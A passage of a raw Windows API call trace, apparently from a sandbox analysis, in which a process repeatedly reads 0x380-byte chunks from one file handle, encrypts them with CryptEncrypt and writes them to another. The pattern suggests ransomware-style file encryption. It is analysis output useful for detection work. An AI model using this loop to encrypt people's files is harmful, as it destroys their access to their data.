lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.760] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.761] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.761] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.761] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.761] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.761] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.761] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.761] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.761] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.761] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.761] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.761] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.762] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.762] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.762] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.762] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.762] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.762] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.762] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.762] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.762] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.762] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.762] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.762] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.762] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.762] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.762] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.762] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.763] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.763] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.763] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.763] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.763] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.763] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.763] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.763] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.763] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.763] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.763] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.763] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.763] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.763] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.764] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.764] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.764] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.764] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.764] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.764] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.764] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.764] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.764] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.764] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.764] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.764] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.764] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.764] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.764] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.765] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.765] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.765] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.765] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.765] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.765] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.765] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.765] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.765] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.765] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.765] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.765] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.765] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.765] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.765] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.766] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.766] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.766] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.766] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.766] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.766] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.766] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.766] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.766] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.766] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.766] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.766] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.766] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.766] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.766] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.767] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.767] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.767] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.767] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.767] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.767] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.767] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.767] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.767] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.767] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, 